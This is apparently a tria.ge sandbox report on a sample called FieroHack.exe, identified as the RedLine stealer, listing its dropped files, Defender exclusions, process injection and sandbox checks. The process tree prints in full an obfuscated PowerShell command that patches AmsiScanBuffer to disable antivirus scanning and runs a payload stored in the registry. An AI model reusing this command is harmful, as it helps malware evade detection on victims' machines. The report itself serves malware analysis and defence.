Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
34s -
max time network
44s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
14/07/2024, 17:00
Static task
static1
Behavioral task
behavioral1
Sample
Midnight/FieroHack.exe
Resource
win10v2004-20240709-en
General
-
Target
Midnight/FieroHack.exe
-
Size
785.9MB
-
MD5
22b9dcd226abe95a3fbe7a02030a5d2b
-
SHA1
399db7ceeeca571804ead588f56fbe5351bc87a2
-
SHA256
b06b787c071c1bc7fb71d6d47c16e439a75e2e43421f5ad9dc4f66dd04b1aa53
-
SHA512
5661b354a82a69d8aa1b3dfb299cb1ef0893f97402bf6392046b8c4f618da73fc1686bfd0487a78163527df23229de4d96605a29457ba61c892e27ecc9db454a
-
SSDEEP
98304:k4cScEqJJRoXw4MzFHjLu/Lfyu6akwy/:LcywSqjLGNkX
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/1792-26-0x0000000000A50000-0x0000000000ABA000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4528 created 612 4528 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 516 powershell.exe -
Creates new service(s) 2 TTPs
-
Executes dropped EXE 3 IoCs
pid Process 1568 WeMod.exe 1792 Sirus.exe 3952 ritphyfejjmj.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 3564 powercfg.exe 2296 powercfg.exe 4636 powercfg.exe 4760 powercfg.exe -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\MRT.exe WeMod.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1568 WeMod.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1568 set thread context of 4628 1568 WeMod.exe 111 PID 4528 set thread context of 1008 4528 powershell.EXE 130 -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1920 sc.exe 1004 sc.exe 4816 sc.exe 2172 sc.exe 3000 sc.exe 3056 sc.exe 2252 sc.exe 4532 sc.exe 3100 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 556 1792 WerFault.exe 85 -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1568 WeMod.exe 1568 WeMod.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1792 Sirus.exe 1568 WeMod.exe 516 powershell.exe 516 powershell.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 4528 powershell.EXE 4528 powershell.EXE 1568 WeMod.exe 1568 WeMod.exe 1568 WeMod.exe 4528 powershell.EXE 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe 1008 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 55 IoCs
description pid Process Token: SeDebugPrivilege 1792 Sirus.exe Token: SeBackupPrivilege 1792 Sirus.exe Token: SeSecurityPrivilege 1792 Sirus.exe Token: SeSecurityPrivilege 1792 Sirus.exe Token: SeSecurityPrivilege 1792 Sirus.exe Token: SeSecurityPrivilege 1792 Sirus.exe Token: SeDebugPrivilege 516 powershell.exe Token: SeShutdownPrivilege 3564 powercfg.exe Token: SeCreatePagefilePrivilege 3564 powercfg.exe Token: SeShutdownPrivilege 4636 powercfg.exe Token: SeCreatePagefilePrivilege 4636 powercfg.exe Token: SeShutdownPrivilege 2296 powercfg.exe Token: SeCreatePagefilePrivilege 2296 powercfg.exe Token: SeShutdownPrivilege 4760 powercfg.exe Token: SeCreatePagefilePrivilege 4760 powercfg.exe Token: SeDebugPrivilege 4528 powershell.EXE Token: SeDebugPrivilege 4528 powershell.EXE Token: SeDebugPrivilege 1008 dllhost.exe Token: SeAuditPrivilege 2060 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2412 svchost.exe Token: SeIncreaseQuotaPrivilege 2412 svchost.exe Token: SeSecurityPrivilege 2412 svchost.exe Token: SeTakeOwnershipPrivilege 2412 svchost.exe Token: SeLoadDriverPrivilege 2412 svchost.exe Token: SeSystemtimePrivilege 2412 svchost.exe Token: SeBackupPrivilege 2412 svchost.exe Token: SeRestorePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeSystemEnvironmentPrivilege 2412 svchost.exe Token: SeUndockPrivilege 2412 svchost.exe Token: SeManageVolumePrivilege 2412 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2412 svchost.exe Token: SeIncreaseQuotaPrivilege 2412 svchost.exe Token: SeSecurityPrivilege 2412 svchost.exe Token: SeTakeOwnershipPrivilege 2412 svchost.exe Token: SeLoadDriverPrivilege 2412 svchost.exe Token: SeSystemtimePrivilege 2412 svchost.exe Token: SeBackupPrivilege 2412 svchost.exe Token: SeRestorePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeSystemEnvironmentPrivilege 2412 svchost.exe Token: SeUndockPrivilege 2412 svchost.exe Token: SeManageVolumePrivilege 2412 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2412 svchost.exe Token: SeIncreaseQuotaPrivilege 2412 svchost.exe Token: SeSecurityPrivilege 2412 svchost.exe Token: SeTakeOwnershipPrivilege 2412 svchost.exe Token: SeLoadDriverPrivilege 2412 svchost.exe Token: SeSystemtimePrivilege 2412 svchost.exe Token: SeBackupPrivilege 2412 svchost.exe Token: SeRestorePrivilege 2412 svchost.exe Token: SeShutdownPrivilege 2412 svchost.exe Token: SeSystemEnvironmentPrivilege 2412 svchost.exe Token: SeUndockPrivilege 2412 svchost.exe Token: SeManageVolumePrivilege 2412 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1172 wrote to memory of 1568 1172 FieroHack.exe 84 PID 1172 wrote to memory of 1568 1172 FieroHack.exe 84 PID 1172 wrote to memory of 1792 1172 FieroHack.exe 85 PID 1172 wrote to memory of 1792 1172 FieroHack.exe 85 PID 1172 wrote to memory of 1792 1172 FieroHack.exe 85 PID 1100 wrote to memory of 4292 1100 cmd.exe 99 PID 1100 wrote to memory of 4292 1100 cmd.exe 99 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 1568 wrote to memory of 4628 1568 WeMod.exe 111 PID 372 wrote to memory of 3652 372 cmd.exe 129 PID 372 wrote to memory of 3652 372 cmd.exe 129 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 4528 wrote to memory of 1008 4528 powershell.EXE 130 PID 1008 wrote to memory of 612 1008 dllhost.exe 5 PID 1008 wrote to memory of 688 1008 dllhost.exe 7 PID 1008 wrote to memory of 964 1008 dllhost.exe 12 PID 1008 wrote to memory of 384 1008 dllhost.exe 13 PID 1008 wrote to memory of 764 1008 dllhost.exe 14 PID 1008 wrote to memory of 1048 1008 dllhost.exe 15 PID 1008 wrote to memory of 1072 1008 dllhost.exe 17 PID 1008 wrote to memory of 1108 1008 dllhost.exe 18 PID 1008 wrote to memory of 1220 1008 dllhost.exe 19 PID 1008 wrote to memory of 1236 1008 dllhost.exe 20 PID 1008 wrote to memory of 1332 1008 dllhost.exe 21 PID 1008 wrote to memory of 1356 1008 dllhost.exe 22 PID 1008 wrote to memory of 1380 1008 dllhost.exe 23 PID 1008 wrote to memory of 1396 1008 dllhost.exe 24 PID 1008 wrote to memory of 1408 1008 dllhost.exe 25 PID 1008 wrote to memory of 1532 1008 dllhost.exe 26 PID 1008 wrote to memory of 1608 1008 dllhost.exe 27 PID 1008 wrote to memory of 1616 1008 dllhost.exe 28 PID 1008 wrote to memory of 1676 1008 dllhost.exe 29 PID 1008 wrote to memory of 1696 1008 dllhost.exe 30 PID 1008 wrote to memory of 1800 1008 dllhost.exe 31 PID 1008 wrote to memory of 1856 1008 dllhost.exe 32 PID 1008 wrote to memory of 1880 1008 dllhost.exe 33 PID 1008 wrote to memory of 1896 1008 dllhost.exe 34 PID 1008 wrote to memory of 1944 1008 dllhost.exe 35 PID 1008 wrote to memory of 1952 1008 dllhost.exe 36 PID 1008 wrote to memory of 2044 1008 dllhost.exe 37 PID 1008 wrote to memory of 2060 1008 dllhost.exe 39 PID 1008 wrote to memory of 2160 1008 dllhost.exe 40 PID 1008 wrote to memory of 2372 1008 dllhost.exe 41 PID 1008 wrote to memory of 2380 1008 dllhost.exe 42 PID 1008 wrote to memory of 2412 1008 dllhost.exe 43 PID 1008 wrote to memory of 2528 1008 dllhost.exe 44 PID 1008 wrote to memory of 2604 1008 dllhost.exe 45 PID 1008 wrote to memory of 2620 1008 dllhost.exe 46 PID 1008 wrote to memory of 2648 1008 dllhost.exe 47 PID 1008 wrote to memory of 2656 1008 dllhost.exe 48 PID 1008 wrote to memory of 2664 1008 dllhost.exe 49 PID 1008 wrote to memory of 2776 1008 dllhost.exe 50 PID 1008 wrote to memory of 3020 1008 dllhost.exe 51 PID 1008 wrote to memory of 3036 1008 dllhost.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:612
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:384
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{38e485ca-1e5b-4733-b4f1-d58be1db2064}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1008
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1048
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1236
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:cNcnQVhxXBEh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iCtVghdmcFyLby,[Parameter(Position=1)][Type]$IkEMAyneRy)$rDTIwunPoVL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+'e'+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+'o'+'r'+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+'e'+'ga'+[Char](116)+'e'+'T'+'y'+[Char](112)+''+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'le'+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$rDTIwunPoVL.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'cia'+'l'+''+[Char](78)+''+[Char](97)+'me'+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$iCtVghdmcFyLby).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$rDTIwunPoVL.DefineMethod('Inv'+'o'+''+[Char](107)+''+'e'+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+'i'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+'N'+[Char](101)+''+[Char](119)+'Sl'+[Char](111)+''+[Char](116)+','+[Char](86)+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+'l',$IkEMAyneRy,$iCtVghdmcFyLby).SetImplementationFlags('R'+[Char](117)+'nt'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $rDTIwunPoVL.CreateType();}$vGqSmXGKySoOj=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'s'+[Char](116)+''+'e'+''+[Char](109)+''+'.'+''+'d'+''+'l'+''+[Char](108)+'')}).GetType('M'+'i'+''+[Char](99)+'r'+[Char](111)+''+[Char](115)+'o'+'f'+''+[Char](116)+''+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+'d'+''+[Char](115)+'');$ztZIOpccyIrfwn=$vGqSmXGKySoOj.GetMethod(''+[Char](71)+'e'+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+'c'+[Char](65)+''+[Char](100)+'dr'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MPTgtmUVeRAUzqqwJsh=cNcnQVhxXBEh @([String])([IntPtr]);$jFhSlGhDRvnVCFJCeDoamd=cNcnQVhxXBEh @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EOtOBjeKLpK=$vGqSmXGKySoOj.GetMethod('G'+'e'+'tM'+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'nd'+'l'+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'')));$SpCEjEOuMmLFaP=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EOtOBjeKLpK,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'dL'+[Char](105)+'br'+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$fexXYfSNqUsqKzZTY=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EOtOBjeKLpK,[Object](''+[Char](86)+'i'+[Char](114)+''+[Char](116)+''+[Char](117)+'al'+'P'+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$EhFPjhT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SpCEjEOuMmLFaP,$MPTgtmUVeRAUzqqwJsh).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'');$jtXMiYlNszqMyPqZI=$ztZIOpccyIrfwn.Invoke($Null,@([Object]$EhFPjhT,[Object]('A'+'m'+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$elnOOPjNcL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fexXYfSNqUsqKzZTY,$jFhSlGhDRvnVCFJCeDoamd).Invoke($jtXMiYlNszqMyPqZI,[uint32]8,4,[ref]$elnOOPjNcL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$jtXMiYlNszqMyPqZI,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fexXYfSNqUsqKzZTY,$jFhSlGhDRvnVCFJCeDoamd).Invoke($jtXMiYlNszqMyPqZI,[uint32]8,0x20,[ref]$elnOOPjNcL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'FT'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+''+[Char](105)+''+[Char](97)+'le'+[Char](114)+''+'s'+'t'+'a'+''+'g'+'er')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1636
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1356
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1396
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1408
-
